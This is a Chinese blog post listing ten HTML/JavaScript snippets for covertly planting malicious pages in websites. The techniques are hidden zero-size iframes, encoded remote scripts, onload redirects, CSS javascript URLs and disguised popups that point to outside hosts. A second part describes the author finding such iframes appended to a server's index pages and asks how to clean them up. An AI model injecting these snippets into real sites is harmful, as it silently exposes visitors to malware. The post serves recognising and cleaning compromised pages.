注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

龙女小曼的三画小屋

漫画、动画、音画。

 
 
 

日志

 
 

常见网页病毒的源代码  

2015-02-17 00:06:58|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
  

 
挂马代码如下
一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body onload="window.location='地址';"></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.caminix.cn"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.caminix.cn></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open("http://www.caminix.cn","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
<a href="http://www.163.com" onMouseOver="www_163_com(); return true;"></a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="http://www.caminix.cn";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>


最近我在网站服务器上发现部分网站根目录下面的index.htm文件被修改过,在网页HTML代码的最后,即</html>后面发现了一些代码,大致有:
<iframe src=http://www.xiaoen.net/copy.htm  width=0 height=0></iframe>
<iframe src=http://www.syhack.com/wm/wow/index.htm width=0 height=0></iframe>
<iframe src=http://www.syhack.com/wm/8000/index.html width=0 height=0></iframe>
这些内容,经检测,这些钳入的域网页都是带病毒的页面,直接用杀毒软件查杀这个目录,因为它是写入的调用代码,所以杀毒软件也没用,其次服务器的我的安全设置也应该还好的,其它方面没发现有入侵记录,所以我估计可能是网站某个程序出现漏洞,或者某些客户上传了某种后门ASP程序,当然这只是我的猜测,不知道网站大虾有没有什么更好的处理方法或者建议?


 

注:(网易四圈联盟电子会刊《中国散文》2015年2月总第五期 )在编辑中出现很大难度,多次乱套,值得一提,希望这篇日志给编委朋友们带来帮助,好好对照检查和学习。

  评论这张
 
阅读(150)| 评论(8)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017